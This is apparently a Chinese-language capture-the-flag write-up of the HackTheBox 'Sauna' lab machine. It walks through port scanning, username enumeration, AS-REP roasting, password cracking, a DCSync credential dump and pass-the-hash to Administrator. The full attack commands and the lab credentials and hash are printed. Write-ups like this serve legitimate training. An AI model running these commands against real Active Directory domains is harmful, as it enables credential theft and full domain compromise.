Sauna on HackTheBox

, , , , , ,

Before all

Victim’s IP : 10.10.10.175
Victim’s Host : *.EGOTISTICAL-BANK.LOCAL
Attacker’s IP : 10.10.14.14

RECON

port scan

Command 

1
rustscan -a 10.10.10.175 --ulimit 5000 -- -sC -sV -Pn

Result 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-12-22 21:12:36Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49668/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49673/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49689/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49697/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 35558/tcp): CLEAN (Timeout)
|   Check 2 (port 26043/tcp): CLEAN (Timeout)
|   Check 3 (port 57297/udp): CLEAN (Timeout)
|   Check 4 (port 28932/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 8h00m06s
| smb2-time: 
|   date: 2024-12-22T21:13:32
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

拿到域名 EGOTISTICAL-BANK.LOCAL,除了常見的 smb, ldap, winrpc 外也很神奇地開了個 web

Username Gathering

進去 http://egotistical-bank.local/about.html 發現六個員工名字,以 username-anarchy
(link) 生成可能的使用者名稱做下一步利用:
image

Command 

1
username-anarchy -i possible.txt > userlist.txt

Exploitation

AS-REP Roasting

先利用 kerbrute 進行使用者名稱爆破: 

1
kerbrute userenum -d EGOTISTICAL-BANK.LOCAL --dc 10.10.10.175 userlist.txt

最後獲得 fsmith 為可用帳號,利用 GetNPUsers 工具嘗試發現它不須預驗證 

1
impacket-GetNPUsers -dc-ip 10.10.10.175 -request -usersfile userlist.txt EGOTISTICAL-BANK.LOCAL/

將取得的 TGT 丟給 john 爆破,即可獲得 fsmith 的密碼為 Thestrokes23
最後利用 evil-winrm 進行登入: 

1
evil-winrm -u fsmith -p Thestrokes23 -i 10.10.10.175

Privilege Escalation

Abusing DCSync

將 winpeas 打入主機 (利用 evil-winrm upload 指令)
發現 WSUS 資料裡存留了一位使用者的帳號密碼?!

image

同時使用 bloodhound 進行域掃描: 

1
bloodhound-python -c All -u 'fsmith' -p 'Thestrokes23' -d EGOTISTICAL-BANK.LOCAL -ns 10.10.10.175 --zip

注意到 SVG_LOANMGR (就是剛剛的USER),對主機有 DCSync

image 

1
impacket-secretsdump 'EGOTISTICAL-BANK.LOCAL'/'svc_loanmgr':'Moneymakestheworldgoround!'@'EGOTISTICAL-BANK.LOCAL'

獲得 Admin Hash 為 823452073d75b9d1cf70ebdf86c7f98e
再次以 evil-winrm 進行 PTH get shell 

1
evil-winrm -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e -i 10.10.10.175

After all

沒錯,我在打 HTB 的 AD 101 Track XD
今天刷了前三台,練了一下手感,接下來應該會變有趣(?)